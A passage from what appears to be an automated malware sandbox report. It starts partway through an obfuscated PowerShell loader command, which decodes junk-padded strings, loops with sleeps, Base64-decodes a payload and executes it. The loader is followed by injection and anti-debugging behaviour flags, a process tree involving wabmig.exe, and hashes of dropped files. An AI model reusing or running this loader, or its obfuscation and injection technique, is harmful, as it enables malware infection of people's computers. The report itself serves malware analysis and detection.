ButieHydror frossCryst[A ton$Prot U KrslnVeligcO erio rhvu Tvinn.ilsat.horeeFlaglrAxlikf mpate PigeiAgonitTv,ng]Pharm=Droge$Ega iHRazoruP ntenPant tMoldisDesilw rticoSpagem ArchaMedi nRegna ');$Unassassinated=Ferulaceous15 ' Osob$ CortIMellen SymmhPo tuaAl uilAftrkeColorr KongeFrkkesOpula. AphtDHaiveo Hyo wT.temnafgudlKejseo,ivska SldedLevogF PentiWrithlUn ere Unde( atab$StortMDuopooJulian,uskioBigaepskvadoVoldtlOvertiImpelsOsmane Aut raut,cep nsatClutt,Har.o$UlotrPUdtr,a Percs Van sSe,boafaceln KrlitSadomeTi wirUbev n.ilkle UnthsF rba)Clois ';$Passanternes=$Fixup[0];Graenseprovins (Ferulaceous15 'Halle$DvnldgTherml RundoRustib O ttATerapl Afgr:LemonHPtyalAGunsmAUl,lifHubsssUnexp=preli(Buc eT BanceH,abasTakletSize - i,dePTiffaa Epo,T Kon hAchil Forkr$Mis,epThor a Sk rS SymbSBlodfA.ecimNSupratBemaeEOversr SubwnMoo nE EnersG,uss) stri ');while (!$Haafs) {Graenseprovins (Ferulaceous15 ' Tils$TilregDrueslSa rio DybsbB.lsaaPsoralCanth:pseudP Bom rPrereeGenbrq TilduSe,ime peralB.gen= Hy o$Danget Chagr Co.duTil aeUr nv ') ;Graenseprovins $Unassassinated;Graenseprovins (Ferulaceous15 'HanebSYndl tTarata Fri rCorditMow d-ForudSSylvil Gge ePa.rie .mbep kse Paren4U son ');Graenseprovins (Ferulaceous15 ' Thor$OpaqugHa idl F,ulorsonnbBuketaHabillDebat:SprinHTi rgaGa ldaAa skf Regis Ekss=Mirak( poteTKonfieFors sIdematUnfri-ReenlPL eseaGurnetK mpkhPaxiu Accol$Inv lPA lisaE,bles OrbisHygroa Udt nDel ntUdfrde U rer eaksnsmagse RespsUnder)Or.de ') ;Graenseprovins (Ferulaceous15 ' Bide$Dob egIn ralAttrao Bleab SydvaBrummlSpiny: UltrC Mot.o Strir,narerStutteT otssPatinp CabroAd umn loakdfourre tonnPrinctP efusSlatihSamariD gerpGenet=Reli $SytilgTaarnlStoicoSpattbDecena Skutl Lor.:DebugPL ncaoOverelLevesyP.akkiR ndedRasurrFur aoUnimps U,diiBia,rs N ss+Sempe+Anako%tufta$ConcoANdbref A prt Indhrd nceyYpur kFlo inSideripokalnMetacg Soris soft.NykalcTroggoAfhrdu ruen P.eftDdema ') ;$Monopoliseret=$Aftryknings[$Correspondentship];}$Strafferegistrenes239=332230;$Hundehvalpene=29477;Graenseprovins (Ferulaceous15 ' und$KonkugMa.lolVirksoPapilbN,geraPolyhlB.neg:UvsencEnormaAgenduLimstd paleaSt mmeBlomk Aztec=Doll oversGPlen e VisntTusin-BradyCIndskoCurumnSp totBenzyeTronanAffaltHeau, Hofso$RntgePP eria HorisSagres ndera ScrunRarert RrbleRealirGi,penD ooleDownhsstudi ');Graenseprovins (Ferulaceous15 ' olon$ Kistgstavrlt enso OverbDaugha ScaflTawny:dubleTNoveliSkolelUdtrksc,ppetM gilr,ygosa Ber.nTid tspedompsaturo ComprC nchtfund eSkader Grooe ElecdPyreneAssev eko=gui.e Frugt[ShlumSBlindyDreams Prect CotteSupvrm Pare.TransCStipeovid,rn BetjvImpereTabitrTe sttB wal]terri:Isbjr:.onpaFglacirGuachodi tomBur eB ,orda MurbsUspileTauto6Anti.4SisseSu,bectPam.hrMov eiln denAdamsgUrino(Udsm,$Sectic ForsaOlieruStil dSa loaGrayceCappu)T,pab ');Graenseprovins (Ferulaceous15 'S.uds$Portrgunclel JudooAntipbBran.au ragl oble: M,slNT gstoBro.bn DictrI.tegess.nmtLak fiZafferUdstuePrognmUn.lueS vtanDictrtSyste Komp=Polye .hsde[klub S EtioyBordksYdendtStigbeDatasmUdgiv.Arro.T d ngeFravrx Rob.tPum e.FrnutEAutisnN,urocAno ooPh.red atoviGyl,enTrafigPeakk]Canke:misso:bl mmAMenupSOver CsituaINereiIbedri. EvanGVarmheKlosetPotteSFoliet CamorAndroiD natn Sporg nond(Fiske$AsleeT AfriiIn,erlNecrosHek,etFrugtr.paalaReturnClimas c sppG soloA tegrravnetTelefe GaterKosteeFo madAtamaeSkden)Oprre ');Graenseprovins (Ferulaceous15 'Tuj.e$PhagogSubselUdv,do besobUndera MccalKarto: porSPaatrtSvaleoNikanvNonintnight=di,co$AntihNOpby oAr,ejn s rerE soreMarketSisteiLuigirDe bieRuttemGgegue CottnRiskrtRecus.OwrehsAkkomuVar ibEmi asPre,atridserDecori.olitnOverdgOutwo(Prior$pastrSArubatRusserSfreraAnticfSjlegfRo,ane ChanrYokere Pigwg ,edkifupmasAnalot TillrS dwaeRavnenNondeeUgen sElekt2 Tote3overu9,ilow,Humfr$galerHSkriduBidi nphiltdRivebeAfdelhUntinvKbstaaUlfhilant,qp,ynthedagsonEstiveo kal)Lo ke ');Graenseprovins $Stovt;"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2584 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Microchip1.Ana && echo t"5⤵
- System Location Discovery: System Language Discovery
PID:2112
-
-
C:\Program Files (x86)\windows mail\wabmig.exe"C:\Program Files (x86)\windows mail\wabmig.exe"5⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2768
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
144B
MD52629e35680aa33f66231c447fcdfb956
SHA166bf2663992b42f976dd81b303f86e2f2e861700
SHA25609cf72cc7bd1f7dec7f1bf6201a421fd1c88b2a01fd68c1e970580e6207d8965
SHA5125a73eafa12e7be4356be896b9afb602ee2c1d359d70047d5e39e69e997e89eee0c0b5092703bb7ba5d272e19593b642bb1a964525bc75c41641f95346a54b1a7
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5fbc10c384b33f066e4062bede2cdbe99
SHA1975bcde178dc1d35c5a531a60679a06b988ba511
SHA25688debac1187aa733b61a7bb77aec5b882f639cccb2c8e09e4d64b30b81b118d4
SHA512b7f2c4720a7ac56aa81a8592bdacb21d7aa7c4b3323cbd56bdac42fc48d3a504a3d9eaf245551252b8a1841c873f615e76c539197e47a9c0b4c572d7b1945fa8
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
Filesize
470KB
MD5dc8b20ecb669b12cb2d377e69425b1ae
SHA17f95a7e40871adbc900378d69125f01672b99484
SHA256efb89bbdef46898ebbb533b069a851427aef1b99983e3156e9b88e4a846828b3
SHA512b9706209f6b21907e9bbc784638877f612674926b12cb2a73bdc0ad50ae93a2dc4e358c5bf524729732afd9798d13aebdcdaa5e424d785819c4cbff9b3ada141
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZATUT4I9LLC7R4B4PPJB.temp
Filesize7KB
MD5c174779a3cd0e99af4ac09a8f0c348ca
SHA1fe356a28744cc305fa8c3e64289da4ea55f0c1e5
SHA256ccad0a305e0d4e1994ee2b198bdc0ae6d32e7dd1469c57e359b768b75cdf7275
SHA512912738b6f6652dea0fd1f1d163e8b92fffd84a48eac790b4e7353f3edf220f0a145b74acdb61f55c418c76e6198e4b950fb5c84d36114d9ad0cf3b3e8b2de496